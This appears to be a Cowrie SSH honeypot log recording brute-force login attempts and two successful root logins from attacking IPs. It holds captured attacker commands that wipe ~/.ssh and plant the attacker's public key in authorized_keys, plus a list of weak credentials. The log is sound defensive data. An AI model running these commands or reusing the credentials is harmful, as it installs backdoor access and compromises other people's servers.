{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56034,"dst_ip":"1.2.3.4","dst_port":22,"session":"0864cc071290","protocol":"ssh","message":"New connection: 212.227.235.229:56034 (1.2.3.4:22) [session: 0864cc071290]","sensor":"my-vps","timestamp":"2025-08-31T01:08:09.986012Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"9.8","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 9.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:10.640280Z","src_ip":"212.227.235.229","session":"f2a7634de017"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:11.011665Z","src_ip":"212.227.235.229","session":"0864cc071290"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:08:11.012332Z","src_ip":"212.227.235.229","session":"0864cc071290"}
{"eventid":"cowrie.login.failed","username":"debian","password":"abc123","message":"login attempt [debian/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:16.938624Z","src_ip":"212.227.235.229","session":"0864cc071290"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40692,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b68423f5873","protocol":"ssh","message":"New connection: 212.227.125.160:40692 (1.2.3.4:22) [session: 5b68423f5873]","sensor":"my-vps","timestamp":"2025-08-31T01:08:17.379776Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:17.382522Z","src_ip":"212.227.125.160","session":"5b68423f5873"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:08:17.455539Z","src_ip":"212.227.125.160","session":"5b68423f5873"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:17.689327Z","src_ip":"212.227.125.160","session":"5b68423f5873"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:18.843272Z","src_ip":"212.227.125.160","session":"5b68423f5873"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59064,"dst_ip":"1.2.3.4","dst_port":22,"session":"986fe20d97c3","protocol":"ssh","message":"New connection: 217.72.205.35:59064 (1.2.3.4:22) [session: 986fe20d97c3]","sensor":"my-vps","timestamp":"2025-08-31T01:08:18.867183Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:18.868433Z","src_ip":"217.72.205.35","session":"986fe20d97c3"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:20.175795Z","src_ip":"212.227.235.229","session":"0864cc071290"}
{"eventid":"cowrie.session.closed","duration":"112.6","message":"Connection lost after 112.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:23.683465Z","src_ip":"212.227.235.229","session":"f2a7634de017"}
{"eventid":"cowrie.session.closed","duration":"25.4","message":"Connection lost after 25.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:25.941670Z","src_ip":"45.78.196.59","session":"fd0e075d694f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50758,"dst_ip":"1.2.3.4","dst_port":22,"session":"25afdef468e2","protocol":"ssh","message":"New connection: 212.227.125.160:50758 (1.2.3.4:22) [session: 25afdef468e2]","sensor":"my-vps","timestamp":"2025-08-31T01:08:27.823520Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:27.824734Z","src_ip":"212.227.125.160","session":"25afdef468e2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:08:27.898872Z","src_ip":"212.227.125.160","session":"25afdef468e2"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:28.130039Z","src_ip":"212.227.125.160","session":"25afdef468e2"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:29.277163Z","src_ip":"212.227.125.160","session":"25afdef468e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45680,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c2c85cd643f","protocol":"ssh","message":"New connection: 212.227.125.160:45680 (1.2.3.4:22) [session: 9c2c85cd643f]","sensor":"my-vps","timestamp":"2025-08-31T01:08:31.989121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:31.989978Z","src_ip":"212.227.125.160","session":"9c2c85cd643f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T01:08:32.205136Z","src_ip":"212.227.125.160","session":"9c2c85cd643f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46964,"dst_ip":"1.2.3.4","dst_port":22,"session":"c98f93f1693e","protocol":"ssh","message":"New connection: 212.227.125.160:46964 (1.2.3.4:22) [session: c98f93f1693e]","sensor":"my-vps","timestamp":"2025-08-31T01:08:33.850634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:34.296581Z","src_ip":"212.227.125.160","session":"c98f93f1693e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:08:34.297445Z","src_ip":"212.227.125.160","session":"c98f93f1693e"}
{"eventid":"cowrie.login.failed","username":"debian","password":"abc123","message":"login attempt [debian/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:36.508595Z","src_ip":"212.227.125.160","session":"c98f93f1693e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60156,"dst_ip":"1.2.3.4","dst_port":22,"session":"f85e3a6415e8","protocol":"ssh","message":"New connection: 212.227.235.229:60156 (1.2.3.4:22) [session: f85e3a6415e8]","sensor":"my-vps","timestamp":"2025-08-31T01:08:37.517483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:08:37.518188Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:08:37.755254Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48126,"dst_ip":"1.2.3.4","dst_port":22,"session":"56566b6c1405","protocol":"ssh","message":"New connection: 212.227.125.160:48126 (1.2.3.4:22) [session: 56566b6c1405]","sensor":"my-vps","timestamp":"2025-08-31T01:08:38.226971Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:38.227945Z","src_ip":"212.227.125.160","session":"56566b6c1405"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:08:38.300531Z","src_ip":"212.227.125.160","session":"56566b6c1405"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:08:38.519743Z","src_ip":"212.227.125.160","session":"56566b6c1405"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60808,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6e16dd23e23","protocol":"ssh","message":"New connection: 212.227.125.160:60808 (1.2.3.4:22) [session: c6e16dd23e23]","sensor":"my-vps","timestamp":"2025-08-31T01:08:38.596095Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123456@qq","message":"login attempt [root/123456@qq] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:08:38.751383Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:08:39.243398Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.244175Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.245288Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60132,"dst_ip":"1.2.3.4","dst_port":22,"session":"c523fa726d11","protocol":"ssh","message":"New connection: 212.227.235.229:60132 (1.2.3.4:22) [session: c523fa726d11]","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.479729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.481067Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.490254Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.548152Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.672840Z","src_ip":"212.227.125.160","session":"56566b6c1405"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.816890Z","src_ip":"212.227.125.160","session":"c98f93f1693e"}
{"eventid":"cowrie.login.success","username":"root","password":"123456@qq","message":"login attempt [root/123456@qq] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.858960Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:08:39.990759Z","src_ip":"212.227.125.160","session":"9c2c85cd643f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:08:40.007509Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.008206Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.009137Z","src_ip":"212.227.235.229","session":"c523fa726d11"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:08:40.028121Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.028677Z","src_ip":"212.227.235.229","session":"f85e3a6415e8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:08:40.036112Z","src_ip":"212.227.125.160","session":"c6e16dd23e23"}
